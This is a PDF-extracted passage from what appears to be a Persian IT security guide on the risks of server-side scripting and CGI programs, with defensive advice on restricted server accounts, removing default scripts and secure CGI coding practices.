ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ ،ﻭ ﻭﺟﻮﺩ ﺗﻨﻬﺎ ﻳﻚ ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺒﺐ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻥ ﻛﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﮔﺮﺩﺩ.
٢١٦
ﺯﺑﺎﻧﻬﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﺒﻴﻪﺷﺪﻩ
ﺍﺑﺪﺍﻉ ﺯﺑﺎﻧﻬﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺳﻮﻣﻴﻦ ﺗﻜﻨﻴﻜﻲ ﺑﻮﺩ ﻛﻪ ﺑﻤﻨﻈﻮﺭ ﺍﻓﺰﻭﺩﻥ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻪ ﺻﻔﺤﺎﺕ ﻭﺏ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻻ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﻧﺪ - ﻗﺮﺍﺭ ﮔﺮﻓﺖ .ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼﻜﻲ -ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺩﺭ ﺻﻔﺤﺔ ﻭﺏ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ،ﻭ ﺳﭙﺲ ﻳﻚ ﻣﻔﺴﺮ ﺩﺭﻭﻧﻲ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ،ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺻﻔﺤﺎﺕ ﻭﺏ ﺭﺍ ﭘﻴﺶ ﺍﺯ
ﻓﺮﺳﺘﺎﺩﻥ ﺻﻔﺤﺔ ﻣﺰﺑﻮﺭ ﺑﺮﺍﻱ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺍﺟﺮﺍ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻊ ﺑﺎﺷﻨﺪ .ﻣﺜﺎﻟﻬﺎﻳﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻋﺒﺎﺭﺗﻨـﺪ
ﺍﺯ ASPﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ JavaScript ،PHP ،ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،ﻭ .mod-perl
٢١٧
ﺏ ﺍﺯ ﭘﻴﺶ ﺗﻌﺒﻴﻪﺷﺪﻩ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭ ﹺ
ﺑﺎﻻﺧﺮﻩ ﺍﻳﻨﻜﻪ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻄﻮﺭ ﻛﻞ ﺑﺎ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻛﺎﺭﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺧﺘـﺼﺎﺻﻲ HTTPﺧـﻮﺩ ﺭﺍ ﺭﻭﻱ
ﺏ ﺧﻮﺩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ.
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭ ﹺ
ﺗﻜﻨﻴﻜﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﺮ ﺷﻤﺮﺩﻳﻢ ﺑـﺪﻟﻴﻞ ﺗﻮﺍﻧﻤﻨـﺪﻳﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺭﻧـﺪ ،ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻣﻨﻴـﺖ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﻭ ﻣﻴﺰﺑـﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﺓ ﺟﺪﻱ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ؛ ﭼﻮﻥ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻦ ﻭﺍﺳﻄﻪﻫـﺎ
ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ -ﺣﺘﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ،ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑـﻪ ﺍﻓـﺮﺍﺩ ﺑﻴﺮﻭﻧـﻲ ﺍﺟـﺎﺯﺓ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ
ﻣﻲﺩﻫﻨﺪ ،ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﻭ ﻳﺎ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻭ ﺗﻜﻨﻴﻚ ﻣﻲﺗﻮﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺏ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩ:
ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﻳﺪ ﭼﻨﺎﻥ ﻃﺮﺍﺣﻲ ﺷﻮﻧﺪ ﻭ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﺑﺠﺰ ﺍﻋﻤـﺎﻝ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﻛـﺎﺭ •
ﺩﻳﮕﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ؛
ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ •
ﺑﮕﻴﺮﻧﺪ ﺗﺎ ﻳﻚ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﺍﺯ ﺧﻮﺩ ﺑﺮﻭﺯ ﺩﻫﻨﺪ ،ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﭼﻨـﺪﻛﺎﺭﺑﺮﻩ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﻣﺘﻔـﺎﻭﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺳـﻄﻮﺡ ﻣﺘﻔـﺎﻭﺕ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺑﭙﺮﺩﺍﺯﻧـﺪ،
ﻻ ﺗﺤﺖ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻣـﻲﺁﻳﻨـﺪ ،ﻣﺜـﻞ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ nobodyﻭ ﻳـﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻣﻌﻤﻮ ﹰ
.httpdﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ CGIﻭ APIﻛـﻪ ﺑـﻪ ﻗـﺼﺪ ﺍﻳﺠـﺎﺩ ﺍﺧـﻼﻝ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣـﻮﺭﺩ
٢١٨
ﻱ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺁﻣﺪ.
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺗﺤﺖ ﻫﻤﺎﻥ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮ ﹺ
ﻱ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺍﻳﺠﺎﺩ ﻧﻜﺮﺩﻩﺍﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﻧﮕﺎﺭﺷـﻬﺎﻱ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮ ﹺ
،98 ،95 ،3.1ﻭ MEﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Windowsﻭ ﻧﻴﺰ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Mac OS 7-9ﻛﻪ ﭘﻴﺶ ﺍﺯ Mac OS Xﻛـﺎﺭﺑﺮﺩ ﺩﺍﺷـﺖ،
ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGIﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﺪ.
ﻱ ﺧﻮﺩ ﻛﺎﺭ ﺳﺎﺩﻩﺍﻱ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﭼﻴـﺰﻱ ﻛـﻪ ﻣـﺸﻜﻼﺕ ﺭﺍ ﻛﺴﺐ ﺁﮔﺎﻫﻲ ﺩﺭ ﻣﻮﺭﺩ ﺻﺤﻴﺢ ﻳﺎ ﻧﺎﺻﺤﻴﺢ ﺑﻮﺩﻥ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺧﻮﺩ ﹺ
ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻲ ﺟﺴﺘﺠﻮﮔﺮﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ،ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺁﺳـﻴﺐﭘـﺬﻳﺮ ﺭﺍ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ،Windowsﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ (PERL.EXE) perlﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﺩﺭ ﺷﺎﺧﺔ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGI
ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻫﺎﻱ ﻭﺏ ﺗﺤﺖ Windowsﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ ،ﺗﻨﻬﺎ ﺑﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ
ﻛﻪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﺟﺮﺍﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ perlﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺳﺎﺩﻩﺗﺮ ﺷﻮﺩ.
ﻳﻚ ﻋﺎﻣﻞ ﺩﻳﮕﺮ ﻧﮕﺮﺍﻧﻲ ،ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ ﻣﻨﺘـﺸﺮ ﺷـﺪﻩﺍﻧـﺪ ﻭ
ﺑﻌﺪﻫﺎ ﺩﺭ ﺁﻧﻬﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﺷﻜﺎﺭ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ ،ﺑﻨـﺪﺭﺕ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ
ﺽ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ )ﺯﻳﺮﺍ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻥ ﻓﻬﻤﻴﺪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ
ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺶﻓﺮ ﹺ
ﻳﺎ ﺧﻴﺮ( ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻄﺮﻧﺎﻙ ﺗﺎ ﻣﺎﻫﻬﺎ ﻭ ﻳﺎ ﺣﺘﻲ ﺳﺎﻟﻬﺎ ﺑﺮ ﺟﺎﻱ ﺧﻮﺩ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ ،ﺣﺘﻲ ﺍﮔـﺮ ﺁﻥ ﻧﻘـﺺ
ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻣﺮﺗﻔﻊ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ،ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGIﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲﺷـﺎﻥ ﺑﻌـﺪ ﺍﺯ ﻣـﺪﺗﻲ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ ﺍﺯ
ﺧﻮﺩﺗﺎﻥ ﻣﺤﻔﺎﻇﺖ ﻛﻨﻴﺪ ،ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻴﺶﻓﺮﺽ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺎﺧﺔ ﺟﺪﻳﺪ ﻣﻨﺘﻘﻞ
ﻛﻨﻴﺪ ﺗﺎ ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ،ﻭ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺷﺎﺧﻪﻫﺎﻱ ﻛﺎﺭﻱ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﻛﻪ ﻭﺍﻗﻌﹰﺎ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺎﺷﻨﺪ.
ﺍﻣﺮﻭﺯﻩ ﻧﺎﺻﺤﻴﺢ ﻧﻴﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻧﺎﺻﺤﻴﺢ ﻣﺤﺴﻮﺏ ﺷﻮﻧﺪ! ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻗـﺪﻳﻤﻲ،
ﻭﺟﻮﺩ ﻋﻼﺋﻢ Unicodeﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻛﺎﺭﺑﺮﺩ ﻓﺮﺍﻭﺍﻧﻲ ﻳﺎﻓﺘﻪﺍﻧﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺑﻮﺩ.
ﺑــﺮﺍﻱ ﻣــﺸﺎﻫﺪﺓ ﻣﺜﺎﻟﻬــﺎﻱ ﺑﻴــﺸﺘﺮ ﺍﺯ ﺁﺛــﺎﺭ ﺟــﺎﻧﺒﻲ ﻧﺎﺧﻮﺍﺳــﺘﻪ ،ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺭﺟــﻮﻉ ﻛﻨﻴــﺪ ﺑــﻪ ﻓــﺼﻞ ﺷــﺎﻧﺰﺩﻫﻢ ﺍﺯ ﻭﻳــﺮﺍﻳﺶ ﺩﻭﻡ ﻛﺘــﺎﺏ
" "Web Security, Privacy, and Commerceﻧﻮﺷﺘﺔ ﮔﺎﺭﻓﻴﻨﻜﻞ.٢١٩
219 Garfinkel
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٦٢
ﺍﺳﺘﻔﺎﺩﻩ ،ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ،ﻋﻼﺋﻢ ﺩﺭﻳﺎﻓﺖﺷﻮﻧﺪﻩ ،ﻭ ﺳﺎﻳﺮ ﺟﻨﺒﻪﻫﺎﻱ ﺭﻓﺘﺎﺭﻱ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻓﻬﺮﺳﺘﻲ ﺍﺯ
ﻫﻤﺔ ﺧﻄﺎﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻭ ﻧﻴﺰ ﻧﺤﻮﺓ ﻭﺍﻛﻨﺶ ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺑﻪ ﺁﻥ ﺧﻄﺎﻫﺎ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴﺶ ﺍﺯ ﻧﻮﺷﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑـﻪ ﺯﺑـﺎﻥ
ﺭﺍﻳﺎﻧﻪ ،ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺍﻧﮕﻠﻴﺴﻲ ﻭ ﻳﺎ ﺯﺑﺎﻥ ﻣﺎﺩﺭﻱ ﺧﻮﺩ ﺷﺮﺡ ﺩﻫﻴﺪ.
ﭘﻴﺶ ﺍﺯ ﺷﺮﻭﻉ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ،ﻣﺸﺨﺼﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺭﺍ ﺑﻪ ﺭﺅﻳﺖ ﻳﻚ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺩﻳﮕـﺮ ﺑﺮﺳـﺎﻧﻴﺪ .ﻣﻄﻤـﺌﻦ .٢
ﺷﻮﻳﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻣﺸﺨﺼﻪﻫﺎ ﺭﺍ ﻣﻲﻓﻬﻤﻨﺪ ﻭ ﻣﻌﺘﻘﺪﻧﺪ ﻋﻤﻠﻜﺮﺩ ﺻﺤﻴﺤﻲ ﺩﺍﺭﺩ .ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻳﻚ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺩﻳﮕﺮ ﺭﺍ ﻧـﺴﺒﺖ ﺑـﻪ
ﺻﺤﺖ ﻋﻤﻠﻜﺮﺩ ﺁﻧﭽﻪ ﺭﻭﻱ ﻛﺎﻏﺬ ﻃﺮﺍﺣﻲ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍﺿﻲ ﻛﻨﻴﺪ ،ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﻓﺎﺯ ﻃﺮﺍﺣـﻲ ﺑﺎﺯﮔـﺸﺘﻪ ﻭ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﻭﺍﺿﺤﺘﺮ ﻛﻨﻴﺪ .ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﭼﻨﺪ ﺑﺮﺍﺑﺮ ﺯﻣﺎﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺻﺮﻑ ﻣﻲﻛﻨﻴﺪ ،ﻫﻨﮕﺎﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺯﺑﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻤﻨﻲ ﺭﺍ ﺑﺮﺍﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGIﻓﺮﺍﻫﻢ ﻛﻨﺪ ،ﻭ ﺍﺯ .٣
ﺧﻄﺎﻫﺎﻱ ﺳﺮﺭﻳﺰﻱ bufferﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ .ﺯﺑﺎﻧﻬﺎﻱ ،python ،perlﻭ rudyﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺯﺑﺎﻧﻬـﺎﻱ C
ﻻ ﮔﺰﻳﻨﻪﻫﺎﻱ ﺿﻌﻴﻒ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ .ﻫﻴﭽﮕﺎﻩ ﺑﺮﺍﻱ ﻣﻔﺴﺮﻫﺎﻱ ﭘﻮﺳﺘﻪﺍﻱ ﻣﺜﻞ ،/bin/shﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫـﺎﻱ CGI ﻭ C++ﻣﻌﻤﻮ ﹰ
ﻧﻨﻮﻳﺴﻴﺪ.
ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻗﺒﻠـﻲ ﺍﺳـﺘﻔﺎﺩﺓ ﻣﺠـﺪﺩ ﻛﻨﻴـﺪ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ ﻛﺘﺎﺑﺨﺎﻧـﻪﺍﻱ .٤
ﺭﻓﻊﺍﺷﻜﺎﻝﺷﺪﺓ CGIﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﻳﻚ ﻓﺎﻳﻞ ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺑﻨﻮﻳﺴﻴﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣﺮﺍﻗﺐ ﺍﺳﺘﻔﺎﺩﺓ
ﻣﺠﺪﺩ ﺍﺯ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺣﺎﻭﻱ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻧﻴﺰ ﺑﺎﺷﻴﺪ.
